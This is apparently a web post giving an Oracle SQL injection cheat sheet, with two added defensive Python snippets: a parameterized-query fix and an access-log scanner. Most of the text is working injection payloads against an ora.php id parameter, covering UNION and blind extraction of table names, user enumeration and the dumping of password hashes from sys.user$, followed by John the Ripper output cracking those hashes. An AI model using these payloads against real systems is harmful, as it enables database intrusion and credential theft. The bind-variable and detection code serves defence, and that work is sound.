SQL Injection In Oracle

1. Finding table names

select table_name from user_tables

Example:

192.168.2.199/ora.php?id=101+union+all+select+table_name+from+user_tables

Blind injection:

192.168.2.199/ora.php?id=101+and+ascii(substr((select+table_name+from+user_tables+where+rownum=1),1,1))>100
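The ora.php?id=... endpoint above is injectable only because the id value is pasted into the SQL text. The following added example (not code from the original page) shows that vulnerable construction next to the hardened form: a strict integer check before the value reaches SQL, and the value passed as a bind variable so the query text never changes. The table and column names are hypothetical, and fetch_product assumes a python-oracledb / cx_Oracle style connection object.

```python
import re

# Vulnerable pattern from the page: the raw id string becomes part of the SQL,
# so "101 union all select table_name from user_tables" is executed as SQL.
def build_query_unsafe(raw_id):
    # hypothetical table and columns
    return "select name, price from products where id = " + raw_id


_INT_RE = re.compile(r"\d{1,10}")


def parse_id(raw_id):
    """Accept only a plain decimal id; anything else is rejected before any SQL is built."""
    if not _INT_RE.fullmatch(raw_id):
        raise ValueError("id must be a decimal integer")
    return int(raw_id)


def build_query_safe(raw_id):
    """Return (sql, binds): the SQL text is constant, the value travels as a bind variable."""
    return "select name, price from products where id = :id", {"id": parse_id(raw_id)}


def fetch_product(conn, raw_id):
    """Run the hardened query; conn is assumed to follow the python-oracledb cursor API."""
    sql, binds = build_query_safe(raw_id)
    with conn.cursor() as cur:
        cur.execute(sql, binds)   # named bind :id, value supplied separately from the text
        return cur.fetchone()


if __name__ == "__main__":
    payload = "101 union all select table_name from user_tables"
    print("unsafe:", build_query_unsafe(payload))
    print("safe:  ", build_query_safe("101"))
    try:
        build_query_safe(payload)
    except ValueError as exc:
        print("rejected:", exc)
```

With bind variables the UNION and ROWNUM tricks on this page have nothing to attach to, because the database receives one fixed statement and one integer; the input check in parse_id is the second layer, so a non-numeric id is logged and rejected rather than silently passed through.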

-----------------------------------------------

2. Iterating through the different rows:

Unfortunately this is not as straightforward: Oracle has no LIMIT clause, so ROWNUM is assigned in a subquery and the wanted row is picked by filtering on it in the outer query.

Syntax:

select column_1, column_2 from (select rownum r_, column_1, column_2 from table_1, table_2 where field_3 = 'some value') where r_ = 2

Example:

192.168.2.199/ora.php?id=101+UNION+ALL+SELECT+TABLE_NAME+FROM+(SELECT+ROWNUM+R,+TABLE_NAME+FROM+USER_TABLES)+WHERE+R=1

--------------------------------------------------------------------------

3. Finding column names:

select column_name from user_tab_columns

--------------------------------------------------------------------------

4. Finding Version:

Select banner from v$version

-----------------------------------------------------------------------

5. Finding database user names:

192.168.2.199/ora.php?id=101+union+all+select+username,null+from+all_users

---------------------------------------------------------------------

6. Finding password hashes (the user in the connection string must be a DBA):

select name, astatus, password from sys.user$ where astatus = 0;

(astatus = 0 restricts the result to accounts that are not locked.)

Example:

192.168.2.199/ora.php?id=101+union+all+select+name||'--'||password+from+sys.user$

In the above example I had only one column in which to return a string from the database, so I concatenated the username and password fields, separated by '--'.
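Every payload in sections 1 to 6 leaves a recognisable trace in the web server access log: a UNION SELECT against a data-dictionary view, ROWNUM paging, the ascii(substr(...)) boolean probe, or a ||'--'|| concatenation. The following added example (not part of the original page) turns those shapes into a small log scanner. The log lines are constructed sample data; the indicator names and the assumption that the id parameter is always numeric are mine.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Indicators taken from the Oracle payload shapes catalogued on this page. Each
# pattern runs against the URL-decoded, lower-cased query string of a request.
ORACLE_SQLI_PATTERNS = {
    "union_select":    re.compile(r"\bunion\b(?:\s+all)?\s+select\b"),
    "data_dictionary": re.compile(r"\b(?:user_tables|user_tab_columns|all_users|v\$version|sys\.user\$)"),
    "rownum_paging":   re.compile(r"\brownum\b"),
    "blind_boolean":   re.compile(r"\bascii\s*\(\s*substr\s*\("),
    "concat_exfil":    re.compile(r"\|\|\s*'[^']*'\s*\|\|"),
}

# Constructed CLF-style access-log lines (sample data, not taken from the page).
SAMPLE_LOG = """\
192.168.2.50 - - [01/Jan/2024:10:00:01 +0000] "GET /ora.php?id=101 HTTP/1.1" 200 512
192.168.2.50 - - [01/Jan/2024:10:00:02 +0000] "GET /ora.php?id=101+union+all+select+table_name+from+user_tables HTTP/1.1" 200 2048
192.168.2.50 - - [01/Jan/2024:10:00:03 +0000] "GET /ora.php?id=101+and+ascii(substr((select+table_name+from+user_tables+where+rownum=1),1,1))>100 HTTP/1.1" 200 512
192.168.2.50 - - [01/Jan/2024:10:00:04 +0000] "GET /ora.php?id=101+union+all+select+name||'--'||password+from+sys.user$ HTTP/1.1" 200 4096
"""

_REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def classify_request(log_line):
    """Return the indicator names found in one access-log line (empty list if clean)."""
    m = _REQUEST_RE.search(log_line)
    if not m:
        return []
    query = m.group(1).partition("?")[2]
    # unquote_plus turns the '+' used in the page's URLs back into spaces.
    decoded = unquote_plus(query).lower()
    hits = [name for name, pat in ORACLE_SQLI_PATTERNS.items() if pat.search(decoded)]
    # The endpoint takes a numeric id; a non-digit value is suspicious on its own.
    for value in parse_qs(query, keep_blank_values=True).get("id", []):
        if not value.isdigit():
            hits.append("id_not_integer")
            break
    return hits


def scan_log(text):
    """Return [(line_number, hits), ...] for every flagged line of an access log."""
    flagged = []
    for number, line in enumerate(text.splitlines(), start=1):
        hits = classify_request(line)
        if hits:
            flagged.append((number, hits))
    return flagged


if __name__ == "__main__":
    for number, hits in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}")
```

The data-dictionary names are the strongest signal: a legitimate application request almost never references user_tables, all_users, v$version or sys.user$ in a query string, whereas the word "union" alone can appear in ordinary search terms. The id_not_integer check is the cheapest of all and catches the blind variant even when the probe is obfuscated.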

----------------------------------------------------------------------------

7. Cracking passwords using John the Ripper:

Thanks to pentestmonkey for this.

$ ./john --rules --wordlist=/home/sid/tools/dictionaries/MAIN-ONE-unix.txt --format=oracle ~/opass

Loaded 14 password hashes with 14 different salts (Oracle [oracle])
DIP              (DIP)
ORACLE           (FLOWS_020100)
ORACLE           (FLOWS_FILES)
ORACLE           (XDB)
ORACLE           (CTXSYS)
PASSWORD         (HR)
PASSWORD         (SYSTEM)
PASSWORD         (SYS)
TEST             (TEST2)
TEST1            (TEST1)
------------------------------------------------------------------------------
What else do you want from a SQL injection? Furious
